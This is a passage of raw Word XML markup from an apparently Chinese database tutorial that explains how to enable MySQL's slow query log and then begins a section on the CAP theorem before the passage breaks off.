          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>说明当前并没有开启慢查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开启慢查询非常简单</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[mysqld]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中添加如下信息：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[mysqld]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>log-slow-queries="C:/Program Files/MySQL/MySQL Server 5.5/log/mysql-slow.log"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>long_query_time = 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>log-queries-not-using-indexes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">log-slow-queries: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>慢查询的日志存储目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>此目录文件一定要有写权限；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下需要写绝对路径，如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>log-slow-queries="C:/Program Files/MySQL/MySQL Server 5.5/log/mysql-slow.log"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">long_query_time: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最长执行时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, MSYQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将记录下所有执行时间超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>条的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>此处为测试时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时间不应太小最好在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5-10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>秒之内</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当然可以根据自己的标准而定</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>log-queries-not-using-indexes    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：没有使用到索引的查询也将被记录在日志中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F629E0" w:rsidRPr="00F41A4C" w:rsidRDefault="00F629E0" w:rsidP="00FE0F01">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置好以后重新启动一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E070F" w:rsidRPr="00F41A4C" w:rsidRDefault="005E070F" w:rsidP="00174C0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004558AC" w:rsidRPr="00F41A4C" w:rsidRDefault="00174C0D" w:rsidP="00691C86">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6D7D" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB6D7D" w:rsidP="00E6562D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="54" w:beforeAutospacing="0" w:after="54" w:afterAutospacing="0" w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论是分布式数据库中很重要的理论基础。</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Consistnecy </w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一致性，</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Avaliability </w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用性，</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Partition-tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分区容忍性</w:t>
      </w:r>
      <w:r w:rsidRPr="001D5848">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
